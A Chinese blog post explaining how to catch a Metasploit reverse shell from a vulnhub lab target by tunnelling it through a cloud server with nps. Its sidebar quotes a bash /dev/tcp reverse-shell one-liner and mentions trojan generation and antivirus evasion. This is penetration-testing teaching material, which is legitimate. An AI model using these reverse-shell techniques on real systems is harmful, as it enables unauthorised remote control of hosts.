云服务器+nps+msf反弹shell小技巧

最新推荐文章于 2024-08-22 16:33:37 发布
最新推荐文章于 2024-08-22 16:33:37 发布
阅读量1.6k 收藏 8
点赞数
分类专栏: vulnhub 反弹shell 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45414878/article/details/113664881
版权

云服务器+nps+msf反弹shell小技巧

有时候我们在做实验或者真实环境测试的时候存在漏洞的服务器在外网,而我们的攻击机kali在内网,在需要msf接收shell的时候不知道该怎么接收,也接收不了(外网ip->内网ip,是不可能找得到的)。此时我们就需要一个云服务器(有外网IP的云主机)再安装一个nps(内网穿透的软件,github上面有,安装教程也在github上面,安装完毕后nps的目录在/etc/nps)。然后具体操作如下

环境:

云服务器:123.57.x.x:8086

靶机:64.69.43.237:10627(为vulnhub 的DC1,DC1我之间的文章有)

攻击机:192.168.x.128

云服务器

在云服务器安装好nps

nps配置

在这里插入图片描述
设置云服务器和kali的内网映射

msf1配置

在这里插入图片描述
目标为靶机,监听为云服务器的外网映射IP和端口

msf2配置

在这里插入图片描述
另起一个msf用于接收云服务器外网映射过来的shell,payload要一致,先run msf2再run msf1,成功从外网拿到shell

在这里插入图片描述

ps:

个人站点博客:XingHe,欢迎来踩~

XingHe_0
关注
专栏目录
Windows配置CA证书颁发机构+NPS-DCServer
新时代先锋的博客
12-28 3万+
Windows配置证书颁发机构+NPS-DCServer
MinIO+NPS+DDNS+旧笔记本搭建私有图床
lunfangyu的博客
05-26 993
MinIO+NPS+DDNS+旧笔记本搭建私有图床 前言 ​ 一篇好的博文,是需要图文并茂的。以前最好用的免费图床应该是PicGo+gitee方式了。但今年,这种gitee已打击这种使用仓库作为图床做法,并且还做了防盗链处理。因此行不通了。所以现在要么使用付费OSS,要么只能另想他法了。之前,我写过typora+picgo实现本地自动转储图片base64这个文章,打算以这种base64的方式替代图床。开始使用还好,但后面便发现了局限性,当图片比较大时,转为base64后,编辑器就无法进行渲染显
linux反弹shell
qq_52072846的博客
11-26 1791
linux反弹shell 在攻击主机上执行端口监听 nc -lvvp port 在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1
如何用内网虚拟机kali实现反弹shell
qq_44657899的博客
05-23 9830
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击机:kali虚拟机(位于内网) ip:192.168.77.128 宿主机:win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我
无需公网IP反弹shell
最新发布
qq_74263993的博客
08-22 198
Windows10(关掉病毒实时查杀,尽量别开防火墙)5.上传木门到Windows10并运行拿到shell。kali机(网络畅通,具有ipv6地址)3.设置msfconsole,生成木马。2.查看自己的ipv6地址。1.启动kali提权。
无公网ip反弹shell
lq22222的博客
10-06 585
因为在kali虚拟上配置的,想要直接在kali虚拟机上面监听,所以内网主机ip地址我们这里选择127.0.0.1,端口任意大数字,我们选择54321,其他都默认,点击确定,这样我们的公网ip就配置好了。相信师傅们在打ctf靶场时都会遇到一个问题,就是部分题目需要一个有公网ip的服务器来反弹shell,但是vps很难找到免费的;这里就给大家推荐一个好用的平台————贝锐花生壳。映射类型选择TCP,映射模板选择SSH服务,然后外网域名下拉就会出现一个随机分配的域名,直接选上即可。此时再看kali终端。
使用阿里云公网ip建立bind,监听客户端连接失败
08-06 1045
bind: Cannot assign requested address 网上的众多答案不能解决我的问题 通过ping可以ping通,但是 使用bind代码,这个ip就是不能用的, 使用 ifconfig -查看网卡 发现居然是局域网,也就是172开头的 推测 阿里云为了提高公网的利用率,使用了大量的局域网络,通过公网网关 广播给局域网络等等措施, 所以我们更改代码 将...
无公网ip反弹shel
m0_52432374的博客
04-30 458
NPS内网穿透工具,服务器端(CentOS)+客户端(CentOS、Windows)
04-30
NPS服务器端部署在具有公网IP的服务器上,其主要职责是接收客户端的连接请求,并协助建立与内网设备的通信通道。在CentOS系统中,安装和配置NPS服务器通常包括以下步骤: 1. **系统环境准备**:确保系统为最新版本...
NPS配置---从腾讯云服务器配置到客户端、服务器及管理页面
ZouHang_1的博客
12-20 3188
NPS配置;腾讯云服务器配置;使用iptables开放特定端口;开启腾讯轻量应用服务器的特定端口;下载、安装以及配置nps服务;端客户端搭建tcp隧道;腾讯云服务器配置使用iptables开放特定端口;我们的阿里云服务器选用Ubuntu18.04镜像,默认安装了iptables服务。
内网渗透代理转发详解及工具介绍
博客地址 www.sec0nd.top
08-16 3668
在进行渗透测试时,getshell打点之后就要进行内网渗透了,那么为了更方便的进行横向移动,需要做代理转发。今天来了解下代理转发以及相关的工具。代理有两种形式,映射和转发,最终的表现形式均为代理端口映射:外网主机A想访问内网主机B上的服务端口转发:外网主机A已经可以访问内网主机B里的任意端口,但是无法访问内网主机C上的端口,此时可以将C主机的端口转发到主机B端口,那么外网主机A访问了内网主机B就等于访问了内网主机C。就简单介绍几种工具,都是比较常用的。......
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 7184
生成木马进行植入
关于内网穿透真实案例讲解
qq_36585338的博客
02-13 914
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 Kali 0x006内网穿透—数据转发 ​ GitHub - shellfeel/Ant-AntV: 一个经过实战考验的免杀程序生成器 MSF监听会话
远控免杀专题(19)-nps_payload免杀
qq_41683305的博客
03-28 1287
免杀能力一览表 几点说明: 1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01....
实用的内网穿透工具NPS安装/使用详解
sqlora的专栏
10-10 1万+
实用的内网穿透工具NPS安装/使用详解
内网穿透工具NPS(详细教程)
清瞳清的博客
11-15 1万+
有时候我们受限于硬件设备和网络的的问题,无法将内网的大容量、高性能存储设备或计算设备对外访问。这个时候就会变的特别苦恼,上云呢成本太大,不用云呢公网又无法直接访问,这个时候怎么办呢,NPS它来了!!!!
反弹shell失败的几种原因
热门推荐
谢公子的博客
05-03 1万+
在实战中,我们经常会遇到各种各样奇怪的环境。 反弹shell失败的原因有很多: 反弹的命令不存在或当前用户无权限调用bash 禁止出站IP 禁止出站端口 禁止出站协议 反弹的命令不存在或当前用户无权限调用bash 由于这种情况下只局限于Linux,所以不考虑Windows 反弹shell的命令,尽管这么多命令可以反弹shell,但是最终都还是调用bash来反弹,所以 #bas...
NPS】安装和配置
weixin_45743148的博客
12-05 3386
nps是一款轻量级、功能强大的内网穿透代理服务器。
Windows 2008 AD+NPS 配置无线Radius认证指南
"无线radius IAS认证是将微软Windows 2008 AD与NPS(Network Policy Server)结合,用作无线网络的认证服务器。此方案适用于已有Windows 2008服务器环境的用户,通过NPS替代传统的IAS(Internet Authentication ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值